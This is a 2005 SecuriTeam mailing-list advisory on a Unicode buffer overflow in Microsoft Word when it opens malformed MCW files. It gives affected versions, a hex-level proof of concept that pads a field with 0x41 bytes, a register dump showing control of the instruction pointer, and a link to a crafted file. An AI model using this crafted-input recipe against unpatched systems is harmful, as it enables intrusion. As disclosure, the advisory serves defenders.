Network Security: Detailed info on [NT] MS Word Unicode Buffer Overflow (MCW)

Subject:	[NT] MS Word Unicode Buffer Overflow (MCW)
Date:	26 May 2005 18:20:00 +0200

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  MS Word Unicode Buffer Overflow (MCW)
------------------------------------------------------------------------


SUMMARY

Microsoft Word is "a word processor program from Microsoft. It was 
originally written by Richard Brodie for IBM PC computers running DOS in 
1983. Later versions were created for the Apple Macintosh (1984), SCO 
UNIX, and Microsoft Windows (1989). It became part of the Microsoft Office 
suite".

Microsoft Word is vulnerable to buffer overflow while opening maliciously 
crafted Unicode MCW (Word for Macintosh Document) file.

DETAILS

Vulnerable Systems:
 * Winword.exe version 10.2627.6714 and prior

Immune Systems:
 * Microsoft Word 2002 Service Pack 3

The Unicode buffer overflow occurs when the user opens malformed MCW 
document.

Proof of concept:
Modify the MCW file by using binary editor as follows, these lines were 
taken from an MCW file:
c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42
00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00
11 04 74 65 73 74 00 06 20 42 61 68 61 61 00 00
00 09 00 00 00 00 0f 54 69 6d 65 73 20 4e 65 77

Change them as follows:
c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42
00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00
11 04 74 65 73 74 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 00 06 20 42 61 68
61 61 00 00 00 09 00 00 00 00 0f 54 69 6d 65 73

EAX = 00000000 EBX = 00000000 ECX = 00000006
EDX = 7C90EB94 ESI = 00000001 EDI = 001262B0
EIP = 00410041 ESP = 00126110 EBP = 00410041
EFL = 00000246

A modified MCW file can be downloaded from:
 <http://study.haifa.ac.il/~bnaamnih/word/foo.mcw> 
http://study.haifa.ac.il/~bnaamnih/word/foo.mcw


ADDITIONAL INFORMATION

The information has been provided by  <mailto:b_naamneh@hotmail.com> Bahaa 
Naamneh.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.

<Prev in Thread]	Current Thread	[Next in Thread>
[NT] MS Word Unicode Buffer Overflow (MCW), SecuriTeam <=

Previous by Date:	[NEWS] Prestige 650R ADSL Router DoS, SecuriTeam
Next by Date:	[NT] Warrior Kings: Battles Fromat String, SecuriTeam
Previous by Thread:	[NEWS] Prestige 650R ADSL Router DoS, SecuriTeam
Next by Thread:	[NT] Warrior Kings: Battles Fromat String, SecuriTeam
Indexes:	[Date] [Thread] [Top] [All Lists]